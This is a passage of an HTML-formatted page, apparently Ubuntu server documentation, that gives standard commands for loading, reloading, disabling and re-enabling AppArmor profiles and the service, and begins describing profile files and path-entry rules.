<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-enforce /etc/apparmor.d/*</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor_parser</span> is used to load a profile into the kernel. It can also be used to reload a currently loaded profile using the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">-r</span> option. To load a profile:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cat /etc/apparmor.d/profile.name | sudo apparmor_parser -a</span>
</span></pre>
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To reload a profile:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cat /etc/apparmor.d/profile.name | sudo apparmor_parser -r</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">service apparmor</span> can be used to <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">reload</span> all profiles:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo service apparmor reload</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">The <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/disable</span> directory can be used along with the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor_parser -R</span> option to <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">disable</span> a profile.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo ln -s /etc/apparmor.d/profile.name /etc/apparmor.d/disable/</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo apparmor_parser -R /etc/apparmor.d/profile.name</span>
</span></pre>
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">re-enable</span> a disabled profile remove the symbolic link to the profile in <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/disable/</span>. Then load the profile using the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">-a</span>option.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo rm /etc/apparmor.d/disable/profile.name</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cat /etc/apparmor.d/profile.name | sudo apparmor_parser -a</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> can be disabled, and the kernel module unloaded by entering the following:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo service apparmor stop</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo update-rc.d -f apparmor remove</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To re-enable <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> enter:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo service apparmor start</span>
<span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo update-rc.d apparmor defaults</span></span></pre>
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span style="font-family: Times, 'Times New Roman', serif;"><div class="hgroup" style="border-bottom-color: rgb(204, 193, 193); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<h2 class="title" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 28px; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
Profiles</h2>
</div>
<div class="region" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="contents" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> profiles are simple text files located in <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/</span>. The files are named after the full path to the executable they profile replacing the "/" with ".". For example <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/bin.ping</span> is the AppArmor profile for the <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/bin/ping</span> command.</div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
There are two main type of rules used in profiles:</div>
<div class="list itemizedlist" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Path entries:</span> which detail which files an application can access in the file system.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
